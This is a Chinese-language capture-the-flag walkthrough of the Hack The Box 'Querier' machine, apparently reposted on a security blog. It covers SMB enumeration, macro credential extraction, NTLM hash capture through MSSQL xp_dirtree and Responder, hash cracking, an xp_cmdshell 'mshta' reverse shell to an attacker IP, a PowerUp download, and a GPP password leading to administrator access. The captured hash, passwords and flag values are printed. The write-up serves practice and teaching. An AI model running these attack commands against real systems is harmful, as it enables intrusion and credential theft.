[Meachines] [Medium] Querier XLSM宏+MSSQL NTLM哈希窃取(…

2024-09-25 37 0

信息收集

IP Address Opening Ports
10.10.10.125 TCP:135, 139, 445, 1433, 5985, 47001, 49664, 49665, 49666, 49667, 49668, 49669, 49670, 49671

$ nmap -p- 10.10.10.125 --min-rate 1000 -sC -sV -Pn

PORT      STATE    SERVICE       VERSION
135/tcp   open     msrpc         Microsoft Windows RPC
139/tcp   open     netbios-ssn   Microsoft Windows netbios-ssn
445/tcp   open     microsoft-ds?
1433/tcp  open     ms-sql-s      Microsoft SQL Server 2017 14.00.1000.00; RTM
|_ssl-date: 2024-09-22T05:41:06+00:00; -10m49s from scanner time.
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
| Not valid before: 2024-09-22T05:34:45
|_Not valid after:  2054-09-22T05:34:45
| ms-sql-ntlm-info: 
|   10.10.10.125:1433: 
|     Target_Name: HTB
|     NetBIOS_Domain_Name: HTB
|     NetBIOS_Computer_Name: QUERIER
|     DNS_Domain_Name: HTB.LOCAL
|     DNS_Computer_Name: QUERIER.HTB.LOCAL
|     DNS_Tree_Name: HTB.LOCAL
|_    Product_Version: 10.0.17763
| ms-sql-info: 
|   10.10.10.125:1433: 
|     Version: 
|       name: Microsoft SQL Server 2017 RTM
|       number: 14.00.1000.00
|       Product: Microsoft SQL Server 2017
|       Service pack level: RTM
|       Post-SP patches applied: false
|_    TCP port: 1433
5985/tcp  open     http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
11560/tcp filtered unknown
22269/tcp filtered unknown
24527/tcp filtered unknown
28228/tcp filtered unknown
43876/tcp filtered unknown
46253/tcp filtered unknown
47001/tcp open     http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49664/tcp open     msrpc         Microsoft Windows RPC
49665/tcp open     msrpc         Microsoft Windows RPC
49666/tcp open     msrpc         Microsoft Windows RPC
49667/tcp open     msrpc         Microsoft Windows RPC
49668/tcp open     msrpc         Microsoft Windows RPC
49669/tcp open     msrpc         Microsoft Windows RPC
49670/tcp open     msrpc         Microsoft Windows RPC
49671/tcp open     msrpc         Microsoft Windows RPC
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

SMB

$ smbmap -H 10.10.10.125 -u 1

[Meachines] [Medium] Querier XLSM宏+MSSQL NTLM哈希窃取(…插图

$ smbclient //10.10.10.125/Reports

smb: \> get "Currency Volume Report.xlsm"

[Meachines] [Medium] Querier XLSM宏+MSSQL NTLM哈希窃取(…插图1

$ ~/.local/bin/olevba Currency\ Volume\ Report.xlsm

[Meachines] [Medium] Querier XLSM宏+MSSQL NTLM哈希窃取(…插图2

olevba 0.60.2 on Python 3.11.9 - http://decalage.info/python/oletools
===============================================================================
FILE: Currency Volume Report.xlsm
Type: OpenXML
WARNING  For now, VBA stomping cannot be detected for files in memory
-------------------------------------------------------------------------------
VBA MACRO ThisWorkbook.cls 
in file: xl/vbaProject.bin - OLE stream: 'VBA/ThisWorkbook'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - 

' macro to pull data for client volume reports
'
' further testing required

Private Sub Connect()

Dim conn As ADODB.Connection
Dim rs As ADODB.Recordset

Set conn = New ADODB.Connection
conn.ConnectionString = "Driver={SQL Server};Server=QUERIER;Trusted_Connection=no;Database=volume;Uid=reporting;Pwd=PcwTWTHRwryjc$c6"
conn.ConnectionTimeout = 10
conn.Open

If conn.State = adStateOpen Then

  ' MsgBox "connection successful"
 
  'Set rs = conn.Execute("SELECT * @@version;")
  Set rs = conn.Execute("SELECT * FROM volume;")
  Sheets(1).Range("A1").CopyFromRecordset rs
  rs.Close

End If

End Sub
-------------------------------------------------------------------------------
VBA MACRO Sheet1.cls 
in file: xl/vbaProject.bin - OLE stream: 'VBA/Sheet1'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - 
(empty macro)
+----------+--------------------+---------------------------------------------+
|Type      |Keyword             |Description                                  |
+----------+--------------------+---------------------------------------------+
|Suspicious|Open                |May open a file                              |
|Suspicious|Hex Strings         |Hex-encoded strings were detected, may be    |
|          |                    |used to obfuscate strings (option --decode to|
|          |                    |see all)                                     |
+----------+--------------------+---------------------------------------------+

username:reporting password:PcwTWTHRwryjc$c6

reporter –> mssql-svc (通过 MSSQL获取 MSSQL NTLM 哈希 ) - xp_dirtree

$ responder -I tun0

[Meachines] [Medium] Querier XLSM宏+MSSQL NTLM哈希窃取(…插图3

$ impacket-mssqlclient [email protected] -windows-auth

[Meachines] [Medium] Querier XLSM宏+MSSQL NTLM哈希窃取(…插图4

执行xp_cmdshell时无法执行命令

[Meachines] [Medium] Querier XLSM宏+MSSQL NTLM哈希窃取(…插图5

SQL> EXEC master..xp_dirtree '\\10.10.16.9\GOT', 1, 1;

[Meachines] [Medium] Querier XLSM宏+MSSQL NTLM哈希窃取(…插图6

在responder中得到NTLM哈希

mssql-svc::QUERIER:50c6614a98bf4210:38E42F28AC9CC4D076EAE043ACF06663:010100000000000000CCDF3A940CDB01D9A0DA5084739BBA0000000002000800410042003200380001001E00570049004E002D00310050003100350059003100530043004C004C005A0004003400570049004E002D00310050003100350059003100530043004C004C005A002E0041004200320038002E004C004F00430041004C000300140041004200320038002E004C004F00430041004C000500140041004200320038002E004C004F00430041004C000700080000CCDF3A940CDB0106000400020000000800300030000000000000000000000000300000CF1051A0C66E4A690D3EFD4D473408519FDB0145FBCD96435ABD6BAB0E0D5A2E0A0010000000000000000000000000000000000009001E0063006900660073002F00310030002E00310030002E00310036002E003900000000000000000000000000

$ hashcat -m 5600 svc /usr/share/wordlists/rockyou.txt --force

[Meachines] [Medium] Querier XLSM宏+MSSQL NTLM哈希窃取(…插图7

username:mssql-src password:corporate568

$ impacket-mssqlclient mssql-svc:'corporate568'@10.10.10.125 -windows-auth

SQL (QUERIER\mssql-svc dbo@master)> enable_xp_cmdshell

SQL (QUERIER\mssql-svc dbo@master)> xp_cmdshell whoami

[Meachines] [Medium] Querier XLSM宏+MSSQL NTLM哈希窃取(…插图8

利用koadic无文件落地获取反向shell

SQL (QUERIER\mssql-svc dbo@master)> xp_cmdshell "mshta http://10.10.16.9:9999/maW6M"

[Meachines] [Medium] Querier XLSM宏+MSSQL NTLM哈希窃取(…插图9

User.txt

42413863de7ecbfa91a1e935705940cd

权限提升 (mssql-svc –> Administrator) GPP 凭据泄露

windows权限提升枚举脚本:
https://github.com/PowerShellMafia/PowerSploit/blob/master/Privesc/PowerUp.ps1

[koadic: ZOMBIE 0 (10.10.10.125) - C:\\Users\Public\Download]> curl -o C:\\Users\Public\Downloads\PowerUp.ps1 http://10.10.16.9/PowerUp.ps1

[koadic: ZOMBIE 0 (10.10.10.125) - C:\\Users\Public\Download]> C:\\Users\Public\Downloads\PowerUp.ps1 && Invoke-AllChecks

Privilege   : SeImpersonatePrivilege
Attributes  : SE_PRIVILEGE_ENABLED_BY_DEFAULT, SE_PRIVILEGE_ENABLED
TokenHandle : 2212
ProcessId   : 192
Name        : 192
Check       : Process Token Privileges

ServiceName   : UsoSvc
Path          : C:\Windows\system32\svchost.exe -k netsvcs -p
StartName     : LocalSystem
AbuseFunction : Invoke-ServiceAbuse -Name 'UsoSvc'
CanRestart    : True
Name          : UsoSvc
Check         : Modifiable Services

ModifiablePath    : C:\Users\mssql-svc\AppData\Local\Microsoft\WindowsApps
IdentityReference : QUERIER\mssql-svc
Permissions       : {WriteOwner, Delete, WriteAttributes, Synchronize...}
%PATH%            : C:\Users\mssql-svc\AppData\Local\Microsoft\WindowsApps
Name              : C:\Users\mssql-svc\AppData\Local\Microsoft\WindowsApps
Check             : %PATH% .dll Hijacks
AbuseFunction     : Write-HijackDll -DllPath 'C:\Users\mssql-svc\AppData\Local\Microsoft\WindowsApps\wlbsctrl.dll'

UnattendPath : C:\Windows\Panther\Unattend.xml
Name         : C:\Windows\Panther\Unattend.xml
Check        : Unattended Install Files

Changed   : {2019-01-28 23:12:48}
UserNames : {Administrator}
NewName   : [BLANK]
Passwords : {MyUnclesAreMarioAndLuigi!!1!}
File      : C:\ProgramData\Microsoft\Group
            Policy\History\{31B2F340-016D-11D2-945F-00C04FB984F9}\Machine\Preferences\Groups\Groups.xml
Check     : Cached GPP Files

username:Administrator password:MyUnclesAreMarioAndLuigi!!1!

$ impacket-psexec [email protected]

[Meachines] [Medium] Querier XLSM宏+MSSQL NTLM哈希窃取(…插图10

Root.txt

8f359d26d9cfd60e2f5fcbcb98239102


4A评测 - 免责申明

本站提供的一切软件、教程和内容信息仅限用于学习和研究目的。

不得将上述内容用于商业或者非法用途,否则一切后果请用户自负。

本站信息来自网络,版权争议与本站无关。您必须在下载后的24个小时之内,从您的电脑或手机中彻底删除上述内容。

如果您喜欢该程序,请支持正版,购买注册,得到更好的正版服务。如有侵权请邮件与我们联系处理。敬请谅解!

程序来源网络,不确保不包含木马病毒等危险内容,请在确保安全的情况下或使用虚拟机使用。

侵权违规投诉邮箱:4ablog168#gmail.com(#换成@)

相关文章

webpack打包站点,js文件名批量获取思路
加密对抗靶场enctypt——labs通关
【论文速读】| 注意力是实现基于大语言模型的代码漏洞定位的关键
蓝队技术——Sysmon识别检测宏病毒
内网渗透学习|powershell上线cs
LLM attack中的API调用安全问题及靶场实践

发布评论